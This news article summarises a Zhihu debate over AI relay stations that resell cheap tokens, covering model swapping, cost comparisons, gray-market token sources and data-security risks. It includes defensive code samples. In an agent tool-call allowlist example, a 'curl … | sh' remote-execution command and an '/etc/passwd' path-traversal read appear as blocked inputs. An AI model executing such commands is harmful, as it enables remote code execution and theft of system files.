AI Relay Stations Spark Heated Debate on Zhihu: Behind Cheap Tokens, What Are Users Really Worried About?

marsbit | Published on 2026-06-04 | Last updated on 2026-06-04

Abstract

A discussion on Zhihu about "AI relay stations" shifted the niche developer topic of "cheap tokens" into broader user awareness. Users moved beyond simply questioning the legitimacy of these services to focus on practical concerns: Where do cheap tokens truly come from? Is the model being accessed the real one? Can relay stations see prompts, code, and API keys? For occasional users, are the risks worth it? The core debate centered less on price and more on trust. A primary worry is model authenticity—the risk of "model swapping," where users paying for a premium model might be routed to a cheaper one, creating an information asymmetry. Others argued that cost comparisons matter; while cheaper than official pay-as-you-go APIs, relay stations may not be the lowest-cost option versus subscriptions, domestic models, or free tiers, making user needs assessment crucial. Speculation about token sources ranged from legitimate bulk discounts to gray-area methods like account sharing or exploiting regional pricing. This opacity makes risk assessment difficult for users. Data security emerged as a critical concern, especially for enterprise use. When processing sensitive information like code, contracts, or client data, the inability to verify a relay station's data handling, retention, or access policies poses significant compliance and confidentiality risks. The evolving consensus suggests relay stations can be used cautiously for low-sensitivity, disposable tasks (e.g., summarizi...

A discussion about AI relay stations on Zhihu has brought the once niche developer topic of 'cheap Tokens' to a much broader user base.

Previously, PANews initiated a discussion on Zhihu titled 'What is an AI relay station? What mysteries lie behind cheap Tokens?'. The question was included in the 'Token Economics' roundtable, sparking lively debate on the forum.

The discussion in the answer section did not stop at binary judgments like 'Are relay stations part of the gray market?'. More users were asking practical questions: Where do the cheap Tokens actually come from? Is the model being accessed the real one? Can the relay station see users' prompts, code, and API keys? For someone who only uses AI occasionally, is the risk worth taking?

This shifted the topic of AI relay stations from a 'tool choice' to a broader issue of cost and trust. As AI begins to enter writing, programming, Agent development, and enterprise automation workflows, Tokens are no longer just a billing unit in model documentation; they have become a tangible usage cost felt directly by users.

Beyond Price, Users' First Concern is 'Is the Model Really What It Claims to Be?'

In the Zhihu discussion, one category of opinions that garnered the most attention was not about price itself, but about the authenticity of the models.

In a highly upvoted answer, one respondent compared AI relay stations to 'AI scalpers'. The analogy is emotionally charged, but it captures users' most intuitive concern: the technical barrier to setting up a relay station is low, since open-source projects already handle model routing, key management, balance systems, and OpenAI protocol compatibility. The real challenge isn't building a forwarding service, but obtaining cheap and stable upstream quotas.

Once the upstream source becomes opaque, the model name a user sees may not match the model actually invoked. The answer section repeatedly mentioned risks like 'model swapping,' 'downgrading,' and 'shadow APIs.' Some users pointed out that in everyday Q&A, the difference between premium and low-cost models isn't always immediately obvious, which ironically creates room for fraud. A user might think they're invoking a flagship model when the request is in fact routed to a lower-cost model, possibly with a system prompt that makes it mimic the claimed model's response style.

This is also the hardest aspect of cheap Tokens to verify. A counterfeit graphics card can be exposed with a benchmark, and falsely advertised bandwidth with a speed test. Large language model outputs, however, are inherently random. A model giving a better answer today and a worse one tomorrow doesn't directly prove it was swapped. A relay station could serve the real model during the testing phase and mix in cheaper models during long-term use, making it very difficult for ordinary users to detect.

This type of discussion moves the question from 'Is the cheap price worth it?' to 'Does the user know what they're actually buying?' If the model source cannot be verified, cheap Tokens are not simply a price discount, but a transaction based on information asymmetry.
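One way to make the "real model during testing, cheaper models later" concern measurable is to rerun a fixed set of probe questions with known answers and compare pass rates between an early window and a later one. The sketch below is illustrative only: the function names and pass counts are hypothetical, and the two-proportion z-test is one reasonable statistical choice, not something proposed in the Zhihu answers. Because outputs are random, a single worse answer proves nothing; a large, consistent drop across many probes is at most a signal worth investigating.

```python
import math

def pass_rate_drop_z(base_pass, base_total, recent_pass, recent_total):
    """Two-proportion z-score for a drop in pass rate.

    Positive values mean the recent window performed worse than the baseline.
    """
    p_base = base_pass / base_total
    p_recent = recent_pass / recent_total
    pooled = (base_pass + recent_pass) / (base_total + recent_total)
    se = math.sqrt(pooled * (1 - pooled) * (1 / base_total + 1 / recent_total))
    if se == 0:
        # Every probe passed (or every probe failed) in both windows.
        return 0.0
    return (p_base - p_recent) / se

def one_sided_p_value(z):
    """P(Z >= z) for a standard normal variable."""
    return 0.5 * math.erfc(z / math.sqrt(2))

# Hypothetical counts: 100 fixed probes per window.
z = pass_rate_drop_z(base_pass=92, base_total=100, recent_pass=74, recent_total=100)
p = one_sided_p_value(z)
print(f"z = {z:.2f}, one-sided p = {p:.4f}")
```

A small p-value here only says the drop is unlikely to be noise. It cannot distinguish a swapped model from an upstream update, a changed sampling setting, or a flawed probe set.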

Relay Stations Aren't Necessarily Cheap; It Depends on the Comparison

Another category of discussion focused on the reference point for cost. Many users noted that relay stations may seem cheap because they often compare themselves to the official API's pay-per-use pricing, rather than to official subscriptions, domestic Chinese models, free tiers, or cloud provider channels.

One response mentioned that for heavy users who fully utilize their official subscription quotas, the unit cost might be lower than some relay stations. Others argued that the pricing of some domestic models is already low enough that for daily development, summarization, translation, and simple coding tasks, routing through overseas model relay stations isn't always necessary.

This perspective doesn't deny the demand for relay stations. Instead, it reminds users to first clarify their own usage patterns. For occasional Q&A, translation, or summarizing public materials, the free tiers of official apps and legitimate tools are often sufficient. For architectural design, code review, or complex reasoning, more powerful models can be used for critical parts, with specific implementations handled by lower-cost models. Relay stations only become a viable option when users truly have sustained, high-frequency, multi-model calling needs.

The perceived low cost of relay stations largely stems from the chosen comparison. Compared to official pay-per-use API prices, they might seem cheap. Compared to subscription plans, domestic models, or free tiers, they might not always be the lowest cost. This viewpoint in the answer section essentially reframes the issue around the user themselves: first assess the need, then evaluate the channel, rather than placing an order just because of a discount.
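The comparison argument comes down to simple arithmetic. The sketch below assumes a flat-fee plan whose quota can be expressed in tokens, which is a simplification, and every price in it is a made-up number for illustration rather than any provider's actual rate.

```python
def effective_price_per_million(monthly_fee, tokens_used_per_month):
    """Effective cost per 1M tokens of a flat-fee plan at a given usage level."""
    if tokens_used_per_month <= 0:
        raise ValueError("usage must be positive")
    return monthly_fee / (tokens_used_per_month / 1_000_000)

def break_even_tokens(monthly_fee, per_million_price):
    """Monthly token volume above which the flat fee beats a per-token price."""
    return monthly_fee / per_million_price * 1_000_000

# Hypothetical prices, in the same currency unit.
SUBSCRIPTION_FEE = 20.0      # flat fee per month
OFFICIAL_API_PRICE = 10.0    # per 1M tokens, pay-per-use
RELAY_PRICE = 3.0            # per 1M tokens, relay station

for label, price in [("official API", OFFICIAL_API_PRICE), ("relay", RELAY_PRICE)]:
    tokens = break_even_tokens(SUBSCRIPTION_FEE, price)
    print(f"subscription beats {label} above {tokens / 1_000_000:.2f}M tokens/month")

# A heavy user consuming 10M tokens a month on the flat-fee plan:
print(effective_price_per_million(SUBSCRIPTION_FEE, 10_000_000))
```

Under these assumed numbers, the relay is the cheapest option only for users whose monthly volume falls below the subscription's break-even point, which matches the point made in the answers: the result depends on the reference price and on the user's own usage.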

When the Source of Low Prices is Unpacked, the Cost of Trust Emerges

Regarding where cheap Tokens come from, Zhihu user answers provided various explanations. The milder paths include bulk purchasing, corporate discounts, cloud provider channels, caching, batch processing, and cross-model routing. Theoretically, these methods can allow relay services to maintain profits while offering prices lower than official rates.

However, the discussion more frequently mentioned gray market supply paths: splitting subscription accounts, shared account pools, batch registration to exploit free tiers, regional price arbitrage, refund exploitation, monetizing cloud provider credits, and more aggressive methods like using stolen credit cards or API keys. While different answers didn't fully agree on the severity, they all pointed to one issue: low prices don't come from a single source but are pieced together from a supply pool of multiple channels.

This also explains why it's difficult for users to assess risk. A request today might go through an official channel, tomorrow through a pool of subscription accounts, and the next day, due to upstream account bans, switch to another model. The user sees the same interface, the same model name, and the same balance page, but the backend might be constantly switching.

More measured voices also appeared in the answer section. Some users believed that a 90% discount doesn't necessarily equal a stolen credit card; price reductions could also come from legitimate but opaque bulk discounts, caching, and routing optimizations. This reminder is important. Labeling all relay stations as illegal or fraudulent doesn't explain why the market persists long-term. However, if a platform doesn't clarify its source, limits, failure handling, and data policies, users also struggle to treat it as trustworthy infrastructure.

In other words, low price itself isn't the conclusion, but merely the entry point to the problem. What truly needs calculation isn't just the Token price, but also model authenticity, service stability, balance risk, and data flow.

As the Discussion Escalates to Data Security, Risk Is No Longer Just About 'Dumber Answers'

Data security was another high-frequency topic in the Zhihu answers. Many users are no longer just worried about models becoming 'less intelligent,' but are concerned about whose servers their prompts, code, business documents, and keys pass through.

In ordinary chat scenarios, a relay station at most affects answer quality and billing experience. However, in AI programming, Agent development, and enterprise internal tool scenarios, request content may contain project structures, error logs, database fields, client lists, contract clauses, business plans, and internal meeting minutes. If a relay station logs, retrieves, or resells this content, the risk is no longer just an API bill issue.

Answers from legal and corporate governance perspectives made this issue more concrete. Relevant responses mentioned that when enterprises and professional service organizations use AI tools to handle contracts, case materials, client data, and source code, they need to consider trade secrets, personal information, data cross-border transfer, client confidentiality obligations, and tool reliability. If the calling chain passes through an unidentified relay station, the enterprise would find it difficult to answer whether data is retained, whether it is transmitted to third parties, whether overseas processing occurs, how long logs are kept, and who can access the backend.

Agent scenarios amplify this risk. Ordinary chat returns text, but an Agent might, based on the model's output, go on to call tools, read files, execute commands, or access links. If a relay station influences the model's returned content, the risk could escalate from 'wrong answer' to 'wrong action.' This is also why the answer section repeatedly emphasized not connecting unknown relay stations to production environments, CI/CD pipelines, internal knowledge bases, and automation tools.
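To limit the step from "wrong answer" to "wrong action", an Agent can treat every tool call proposed by the model as untrusted input and check it against an allowlist before executing anything. The following is a minimal sketch under stated assumptions: the tool names, the sandbox path, and the `{"name": ..., "arguments": {...}}` call shape are all hypothetical and do not correspond to any particular SDK.

```python
from pathlib import Path

ALLOWED_TOOLS = {"read_file", "search_docs"}   # hypothetical tool names
WORKSPACE = Path("/srv/agent-workspace")       # hypothetical sandbox root

def is_call_permitted(call: dict) -> bool:
    """Return True only for allowlisted tools with arguments inside the sandbox."""
    name = call.get("name")
    args = call.get("arguments", {})
    if name not in ALLOWED_TOOLS or not isinstance(args, dict):
        return False
    if name == "read_file":
        raw_path = str(args.get("path", ""))
        if not raw_path:
            return False
        # Resolve ".." segments and absolute paths before comparing.
        target = (WORKSPACE / raw_path).resolve()
        return target.is_relative_to(WORKSPACE.resolve())  # Python 3.9+
    return True

proposed_calls = [
    {"name": "read_file", "arguments": {"path": "notes/todo.txt"}},
    {"name": "read_file", "arguments": {"path": "../../etc/passwd"}},
    {"name": "run_shell", "arguments": {"cmd": "curl http://example.invalid | sh"}},
]
for call in proposed_calls:
    print(call["name"], "->", "allow" if is_call_permitted(call) else "block")
```

A check like this does not make an untrusted relay safe. It only narrows what a tampered response can trigger, which is why the answers still advise keeping unknown relay stations out of production and CI/CD pipelines.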

This part of the discussion pushed the issue of relay stations from a consumer-grade tool problem to an enterprise-grade governance problem. For individual users, the risks involve balance, privacy, and experience. For enterprises, risks additionally include procurement compliance, vendor vetting, employees bypassing rules, and liability boundaries after incidents.

The Minimum Consensus Formed in the Zhihu Discussion: It's Usable, But Don't Use It by Default

The discussion didn't yield a simple answer. No one could prove all relay stations are untrustworthy, nor could anyone prove cheap Tokens are definitely safe. The judgment closer to consensus is: relay stations can be used as tools for low-sensitivity, replaceable, interruptible tasks, but they shouldn't become the default entry point for all AI tasks.

For summarizing public materials, simple translation, toy projects, and low-risk testing, small-scale trial use is acceptable. Tasks involving company-private code, production logs, client data, contracts, finance, investment materials, or data from sensitive industries like healthcare and law should not be handed over to unknown relay stations. Where Agents and automated execution are involved, extra caution is needed regarding tool calls, file reading, and key exposure.

Many users in the answer section also gave similar usage advice: don't top up large amounts; don't lock your entire workflow to a single relay station; keep official APIs, domestic models, or legitimate aggregators as backup routes; use fixed test questions to periodically sample model quality; anonymize or summarize data where possible; and do not integrate relay stations into the company's production chain.
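The "anonymize where possible" advice can be partly automated by masking obvious secrets before a prompt leaves the machine. The sketch below is a rough illustration, not a complete solution: the three patterns (key-like strings starting with `sk-`, email addresses, and `password=`-style assignments) are assumptions chosen for the example, and real data will contain sensitive content that no simple regex catches.

```python
import re

# Illustrative patterns only; extend or replace them for real data.
REDACTION_RULES = [
    (re.compile(r"\bsk-[A-Za-z0-9_-]{16,}\b"), "[REDACTED_KEY]"),
    (re.compile(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b"),
     "[REDACTED_EMAIL]"),
    (re.compile(r"\b(password|secret|token)\s*[=:]\s*\S+", re.IGNORECASE),
     r"\1=[REDACTED]"),
]

def redact(text: str) -> str:
    """Apply each redaction rule in order and return the masked text."""
    for pattern, replacement in REDACTION_RULES:
        text = pattern.sub(replacement, text)
    return text

sample = (
    "Request failed with key sk-abcdefghijklmnop1234 for alice@example.com, "
    "password=hunter2"
)
print(redact(sample))
```

Redaction reduces exposure but does not remove it: project structure, business logic, and client context can still be inferred from what remains, so sensitive tasks are better kept off unknown relay stations altogether.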

This advice may sound uncomplicated, but it is more valuable than 'recommending a specific platform.' The temptation of cheap Tokens lies in lowering the entry barrier, but the real cost of AI use isn't just written on the price list. Model authenticity, data flow, service stability, balance risk, and compliance responsibilities all exist beyond the price.

Under the 'Token Economics' Roundtable, Relay Stations Are Just One Aspect

This is also the significance of including this question in the 'Token Economics' roundtable.

In the context of cryptocurrency, Tokens are often discussed as assets, incentives, and governance tools. In the AI context, Tokens are more like a measurable production cost. They determine how frequently users can use models, whether developers can integrate AI into workflows, and whether enterprises are willing to include model calls in long-term budgets.

The reason AI relay stations sparked heated debate is not that they are particularly novel, but that they brought this sense of cost directly to users. When model capabilities are priced per Token, it's difficult to simultaneously satisfy cheapness, stability, safety, and accountability. What users are truly worried about is not just whether there's a mystery behind cheap Tokens, but how much trust they are surrendering to save a little on API call fees.

Relay stations will likely continue to exist long-term. They solve real pain points regarding access, payment, pricing, and multi-model integration. However, this Zhihu discussion has already provided a clear reminder: the easier AI capabilities are to obtain, the more users need to know where their requests pass through, where the models come from, and what data is left behind.

